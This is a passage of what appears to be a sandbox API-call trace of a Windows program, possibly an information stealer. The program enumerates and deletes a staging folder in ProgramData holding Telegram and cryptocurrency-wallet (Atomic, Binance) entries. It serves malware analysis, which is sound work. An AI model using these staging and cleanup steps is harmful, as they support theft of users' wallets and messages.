lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", lpUsedDefaultChar=0x0) returned 56 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a29c0 [0116.502] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea418 | out: hHeap=0x29a0000) returned 1 [0116.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Telegram", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa) returned 0x29aaae0 [0116.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Telegram", cchWideChar=10, lpMultiByteStr=0x29aaae0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Telegram", lpUsedDefaultChar=0x0) returned 10 [0116.503] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0116.503] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\telegram"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.503] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0116.503] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970538 | out: hHeap=0x29a0000) returned 1 [0116.503] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.503] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\telegram")) returned 0 [0116.503] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0116.503] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x347852ca, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x347852ca, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x347852ca, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wallets", cAlternateFileName="")) returned 1 [0116.503] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.503] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.503] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.503] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.503] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.503] lstrcatW (in: lpString1="\\", lpString2="Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.503] lstrcmpW (lpString1="Wallets", lpString2=".") returned 1 [0116.503] lstrcmpW (lpString1="Wallets", lpString2="..") returned 1 [0116.503] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.503] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\*.*" [0116.503] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x347852ca, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x347852ca, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0116.503] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.505] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.505] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\." [0116.505] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.505] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.505] lstrcatW (in: lpString1="\\Wallets\\", lpString2="." | out: lpString1="\\Wallets\\.") returned="\\Wallets\\." [0116.505] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.505] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x347852ca, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x347852ca, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.506] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.506] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.506] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\.." [0116.506] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.506] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.506] lstrcatW (in: lpString1="\\Wallets\\", lpString2=".." | out: lpString1="\\Wallets\\..") returned="\\Wallets\\.." [0116.506] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.506] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.506] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Atomic", cAlternateFileName="")) returned 1 [0116.506] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.506] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.506] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="Atomic" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" [0116.506] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.506] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.506] lstrcatW (in: lpString1="\\Wallets\\", lpString2="Atomic" | out: lpString1="\\Wallets\\Atomic") returned="\\Wallets\\Atomic" [0116.506] lstrcmpW (lpString1="Atomic", lpString2=".") returned 1 [0116.506] lstrcmpW (lpString1="Atomic", lpString2="..") returned 1 [0116.506] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" [0116.506] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\*.*" [0116.506] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0116.506] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" [0116.506] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\" [0116.507] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\." [0116.507] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Atomic" | out: lpString1="\\Wallets\\Atomic") returned="\\Wallets\\Atomic" [0116.507] lstrcatW (in: lpString1="\\Wallets\\Atomic", lpString2="\\" | out: lpString1="\\Wallets\\Atomic\\") returned="\\Wallets\\Atomic\\" [0116.507] lstrcatW (in: lpString1="\\Wallets\\Atomic\\", lpString2="." | out: lpString1="\\Wallets\\Atomic\\.") returned="\\Wallets\\Atomic\\." [0116.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.507] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.507] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" [0116.507] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\" [0116.507] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic\\.." [0116.507] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Atomic" | out: lpString1="\\Wallets\\Atomic") returned="\\Wallets\\Atomic" [0116.507] lstrcatW (in: lpString1="\\Wallets\\Atomic", lpString2="\\" | out: lpString1="\\Wallets\\Atomic\\") returned="\\Wallets\\Atomic\\" [0116.507] lstrcatW (in: lpString1="\\Wallets\\Atomic\\", lpString2=".." | out: lpString1="\\Wallets\\Atomic\\..") returned="\\Wallets\\Atomic\\.." [0116.507] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.507] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.507] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0116.507] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.507] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2a08 [0116.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", cchWideChar=62, lpMultiByteStr=0x29a2a08, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", lpUsedDefaultChar=0x0) returned 62 [0116.507] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.508] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a69b8 [0116.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a69b8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69b8 | out: hHeap=0x29a0000) returned 1 [0116.508] PathMatchSpecW (pszFile="Atomic", pszSpec="*.*") returned 1 [0116.508] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.508] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970510 [0116.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.508] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2930 [0116.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", cchWideChar=62, lpMultiByteStr=0x29a2930, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic", lpUsedDefaultChar=0x0) returned 62 [0116.508] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2810 [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0116.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Atomic", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.508] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab88 [0116.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Atomic", cchWideChar=16, lpMultiByteStr=0x29aab88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\Atomic", lpUsedDefaultChar=0x0) returned 16 [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab88 | out: hHeap=0x29a0000) returned 1 [0116.508] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\atomic"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970510 | out: hHeap=0x29a0000) returned 1 [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.508] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Atomic" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\atomic")) returned 0 [0116.508] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0116.509] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Binance", cAlternateFileName="")) returned 1 [0116.509] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.509] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.509] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="Binance" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" [0116.509] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.509] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.509] lstrcatW (in: lpString1="\\Wallets\\", lpString2="Binance" | out: lpString1="\\Wallets\\Binance") returned="\\Wallets\\Binance" [0116.509] lstrcmpW (lpString1="Binance", lpString2=".") returned 1 [0116.509] lstrcmpW (lpString1="Binance", lpString2="..") returned 1 [0116.509] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" [0116.509] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\*.*" [0116.509] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0116.509] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" [0116.509] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\" [0116.509] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\." [0116.509] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Binance" | out: lpString1="\\Wallets\\Binance") returned="\\Wallets\\Binance" [0116.509] lstrcatW (in: lpString1="\\Wallets\\Binance", lpString2="\\" | out: lpString1="\\Wallets\\Binance\\") returned="\\Wallets\\Binance\\" [0116.509] lstrcatW (in: lpString1="\\Wallets\\Binance\\", lpString2="." | out: lpString1="\\Wallets\\Binance\\.") returned="\\Wallets\\Binance\\." [0116.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.509] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, 